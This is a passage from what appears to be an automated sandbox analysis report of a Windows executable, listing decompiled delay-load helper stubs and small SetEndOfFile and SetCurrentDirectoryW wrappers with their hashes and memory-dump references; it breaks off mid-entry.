                • Opcode Fuzzy Hash: 25a9acc15338df497f311b4985af4a87f23ab1c00fbc5683c2815c03d0a849cd
                • Instruction Fuzzy Hash: D2B012E2758000BD3104B2496C02D7B031DC0C0B34730C06BF507C5280F4404C051036
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD1DD, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD1DD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf04); // executed
				goto __eax;
			}








                0x00cbd1ae
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8d15df0a79234cd93e613b3ca1b241fc548e2121a08ffb3a9fad7c703ed605b2
                • Instruction ID: 060f7716b223ce5b90d8db095f5de970a0f9944adddb98ba14ce7cede012b4f7
                • Opcode Fuzzy Hash: 8d15df0a79234cd93e613b3ca1b241fc548e2121a08ffb3a9fad7c703ed605b2
                • Instruction Fuzzy Hash: 3DB012E2758000BD3104B249AD02D7B020CC0C0B34730806BF107C5240F4414C061036
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD1A4, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD1A4() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf08); // executed
				goto __eax;
			}








                0x00cbd1ae
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b68c234e8531cacb98fa611f39dbfffd56993c79ccd89fe62d89f7b94a37b6c9
                • Instruction ID: 9f6d06a797ce65eb59ed9b5cdd3620d32d8f6542a875b1c56c89bb0044e6c34a
                • Opcode Fuzzy Hash: b68c234e8531cacb98fa611f39dbfffd56993c79ccd89fe62d89f7b94a37b6c9
                • Instruction Fuzzy Hash: 85B012E2798104BD31047245ED02C7B020DC1C0B34730856BF103C4180F4404C451036
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD1BF, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD1BF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab6c, 0xcddf10); // executed
				goto __eax;
			}








                0x00cbd1ae
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 2818c75c13df2ca9ffe850d868285a292d61ec9c9d7acfe4fc30df062e92600d
                • Instruction ID: 7a451215f90e92375dbce1cb3bd529a4d71628707fc3e1ccf6f5f7fff075d70d
                • Opcode Fuzzy Hash: 2818c75c13df2ca9ffe850d868285a292d61ec9c9d7acfe4fc30df062e92600d
                • Instruction Fuzzy Hash: 22B012D2798000BD3114B2496C02C7B020CD0C0B34730846BF107C4288F4404C051036
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD205, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD205() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab8c, 0xcddff8); // executed
				goto __eax;
			}








                0x00cbd20f
                0x00cbd217
                0x00cbd21e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a794de805bb43a64f4cffca3b3a6e7ff163282d3c918115e2f92287837d07cf9
                • Instruction ID: 4aedaa5ffc14f9ee3aa0b5a82c6366c6cec6ca59816abf0a4895ac4753f243c3
                • Opcode Fuzzy Hash: a794de805bb43a64f4cffca3b3a6e7ff163282d3c918115e2f92287837d07cf9
                • Instruction Fuzzy Hash: F1B012D52D9100BD310812A56C02C77030CD1C0F38730852BF113C0184B4408C491033
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD23E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD23E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab8c, 0xcddff0); // executed
				goto __eax;
			}








                0x00cbd20f
                0x00cbd217
                0x00cbd21e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3375811d947069fde75ab25ea5020f5ca23eaa1d0707e29356320c37c87c7c17
                • Instruction ID: 16a4a99df5c2d7d5178f7afb3e28538a2880f8f5e60e7219da80d150d83d834f
                • Opcode Fuzzy Hash: 3375811d947069fde75ab25ea5020f5ca23eaa1d0707e29356320c37c87c7c17
                • Instruction Fuzzy Hash: D5B012D52D9000BD310852A96C02E77034CE0C0B38730802BF107C1244F4408C091033
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD234, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD234() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdab8c, 0xcddffc); // executed
				goto __eax;
			}








                0x00cbd20f
                0x00cbd217
                0x00cbd21e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3137cdf6d60abd1cd0880fff04257999446d41b3dd5563de1a38df4e97e84870
                • Instruction ID: 40da89577c2ce40716de9e9ecd7efaa7d8389bacb39b533a3ad6c3ffa060952a
                • Opcode Fuzzy Hash: 3137cdf6d60abd1cd0880fff04257999446d41b3dd5563de1a38df4e97e84870
                • Instruction Fuzzy Hash: 87B012D5299000BD310852A96C02D77034DD0C0B38730C02BF507C1240F4408C091033
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD7DA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CBD7DA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00CBD53A(_t3, _t4, _t8, _t9, _t10, 0xcdabcc, 0xcddeb4); // executed
				goto __eax;
			}








                0x00cbd7e4
                0x00cbd7ec
                0x00cbd7f3

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD7EC
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: ff12f20a6fd1c92d2af445e165f1c780f29adda532afe045e30d82b39b285c98
                • Instruction ID: 9f6e37c0bea6c96cf520eb17edf4334ccdef2f5a4ee28340da08ddb620e74ec0
                • Opcode Fuzzy Hash: ff12f20a6fd1c92d2af445e165f1c780f29adda532afe045e30d82b39b285c98
                • Instruction Fuzzy Hash: 2BB012D1258103FF310461116E02CB7030CC0D0B2C730812BF103D4184B8419C061032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD1D8, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00CBD1D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xcdab6c); // executed
				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: db0c75d00fd1e50db3d612642279b8f7e9d685322ccbf63669981bbf1b953bb4
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: db0c75d00fd1e50db3d612642279b8f7e9d685322ccbf63669981bbf1b953bb4
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD1EC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00CBD1EC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xcdab6c); // executed
				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a490df2805973a35ff79708d4c4fc712a89ac73f5477d5b80e97d87cf8ecb59d
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: a490df2805973a35ff79708d4c4fc712a89ac73f5477d5b80e97d87cf8ecb59d
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD1F6, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00CBD1F6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xcdab6c); // executed
				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9ca2103ae4dc46ae37119b505a1173060d73312c3e97c0945257dd7f914ce5ea
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: 9ca2103ae4dc46ae37119b505a1173060d73312c3e97c0945257dd7f914ce5ea
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD200, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00CBD200() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xcdab6c); // executed
				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4e79facfa36df3673f45d2790026e281c44e6a99e10290561133be4a41f2d1de
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: 4e79facfa36df3673f45d2790026e281c44e6a99e10290561133be4a41f2d1de
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD22F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00CBD22F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xcdab8c); // executed
				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                0x00cbd212
                0x00cbd217
                0x00cbd21e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 85f900e649889bdebce95d47a41b250154ec72c283287be2896903cfe13442c5
                • Instruction ID: 199250cd1cbf159d7b82bcd51202444e7a3003bfcf321d393df6ac18ed953c41
                • Opcode Fuzzy Hash: 85f900e649889bdebce95d47a41b250154ec72c283287be2896903cfe13442c5
                • Instruction Fuzzy Hash: 83A011EA2AA002BC300822A2AC02CBB030CC0C0B38B30882BF00380080B8808C0A2032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD225, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00CBD225() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xcdab8c); // executed
				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                0x00cbd212
                0x00cbd217
                0x00cbd21e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c49ec85e93f2f4e0c18a1f7f18e7fd14299c3bc4c8779de50b4f9b0dced43717
                • Instruction ID: 199250cd1cbf159d7b82bcd51202444e7a3003bfcf321d393df6ac18ed953c41
                • Opcode Fuzzy Hash: c49ec85e93f2f4e0c18a1f7f18e7fd14299c3bc4c8779de50b4f9b0dced43717
                • Instruction Fuzzy Hash: 83A011EA2AA002BC300822A2AC02CBB030CC0C0B38B30882BF00380080B8808C0A2032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9BD6, Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CA9BD6(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}




                0x00ca9bd9
                0x00ca9be2
                0x00ca9be5

                APIs
                • SetEndOfFile.KERNELBASE(?,00CA8F33,?,?,-00001960), ref: 00CA9BD9
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File
                • String ID:
                • API String ID: 749574446-0
                • Opcode ID: 7c94639141b0f782d1ff7c78e48d60ffc6e26e46faf319ff92462d0b6d8ab29c
                • Instruction ID: 8236841d5a15850eda7fc113814cda8051b9ea5198ff99c04ebf8b73ab3e07ea
                • Opcode Fuzzy Hash: 7c94639141b0f782d1ff7c78e48d60ffc6e26e46faf319ff92462d0b6d8ab29c
                • Instruction Fuzzy Hash: 33B011300A200A8A8E002B30CC08A283B22EA2230A30082A0A002CA0A8CB22C003AA00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB9A8D, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CB9A8D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




                0x00cb9a91
                0x00cb9a99
                0x00cb9a9d

                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,00CB9CE4,C:\Users\user\Desktop,00000000,00CE85FA,00000006), ref: 00CB9A91
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: ed978ca703ede180ad8375e6b8144ad935ab68144a74a61df71860f61abfbe04
                • Instruction ID: 2a60a7f9cdbc7e7d36af842965fe85b1fd54a74c2fc600132d39d0f02fe602df
